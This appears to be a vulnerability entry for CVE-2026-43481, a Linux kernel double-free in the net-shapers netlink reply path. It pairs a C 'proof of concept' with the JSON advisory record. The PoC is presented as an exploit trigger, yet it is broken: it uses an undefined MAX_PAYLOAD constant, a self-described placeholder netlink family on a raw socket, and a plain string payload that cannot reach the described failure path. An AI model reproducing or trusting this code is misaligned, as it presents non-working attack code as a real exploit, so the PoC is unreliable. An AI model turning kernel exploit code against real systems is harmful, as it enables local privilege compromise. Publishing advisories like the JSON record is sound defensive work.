CVE-2026-43481

#include <stdio.h> #include <string.h> #include <stdlib.h> #include <unistd.h> #include <sys/socket.h> #include <linux/netlink.h> // Proof of Concept for CVE-2026-43481 // This code attempts to trigger the error path in net_shaper_nl_get_doit // by sending a malformed Netlink message to the kernel. #define NETLINK_SHAPER 31 // Placeholder for the actual family ID int main() { int sock_fd; struct sockaddr_nl src_addr, dest_addr; struct nlmsghdr *nlh = NULL; char *msg = "Trigger"; // Create Netlink socket sock_fd = socket(AF_NETLINK, SOCK_RAW, NETLINK_SHAPER); if (sock_fd < 0) { perror("Socket creation failed"); return -1; } memset(&src_addr, 0, sizeof(src_addr)); src_addr.nl_family = AF_NETLINK; src_addr.nl_pid = getpid(); bind(sock_fd, (struct sockaddr*)&src_addr, sizeof(src_addr)); memset(&dest_addr, 0, sizeof(dest_addr)); dest_addr.nl_family = AF_NETLINK; dest_addr.nl_pid = 0; // Kernel // Allocate message buffer nlh = (struct nlmsghdr *)malloc(NLMSG_SPACE(MAX_PAYLOAD)); memset(nlh, 0, NLMSG_SPACE(MAX_PAYLOAD)); nlh->nlmsg_len = NLMSG_SPACE(MAX_PAYLOAD); nlh->nlmsg_pid = getpid(); nlh->nlmsg_flags = 0; // Copy payload strcpy(NLMSG_DATA(nlh), msg); // Send message to kernel // Attempting to hit the genlmsg_reply failure path sendto(sock_fd, nlh, nlh->nlmsg_len, 0, (struct sockaddr*)&dest_addr, sizeof(dest_addr)); printf("PoC message sent to trigger CVE-2026-43481.\n"); close(sock_fd); free(nlh); return 0; }

{"cve": {"id": "CVE-2026-43481", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2026-05-13T16:16:51.287", "lastModified": "2026-05-20T17:16:23.260", "vulnStatus": "Received", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nnet-shapers: don't free reply skb after genlmsg_reply()\n\ngenlmsg_reply() hands the reply skb to netlink, and\nnetlink_unicast() consumes it on all return paths, whether the\nskb is queued successfully or freed on an error path.\n\nnet_shaper_nl_get_doit() and net_shaper_nl_cap_get_doit()\ncurrently jump to free_msg after genlmsg_reply() fails and call\nnlmsg_free(msg), which can hit the same skb twice.\n\nReturn the genlmsg_reply() error directly and keep free_msg\nonly for pre-reply failures."}], "metrics": {"cvssMetricV31": [{"source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.8, "baseSeverity": "HIGH", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 5.9}]}, "references": [{"url": "https://git.kernel.org/stable/c/57885276cc16a2e2b76282c808a4e84cbecb3aae", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/83f7b54242d0abbfce35a55c01322f50962ed3ee", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}, {"url": "https://git.kernel.org/stable/c/8738dcc844fff7d0157ee775230e95df3b1884d7", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67"}]}}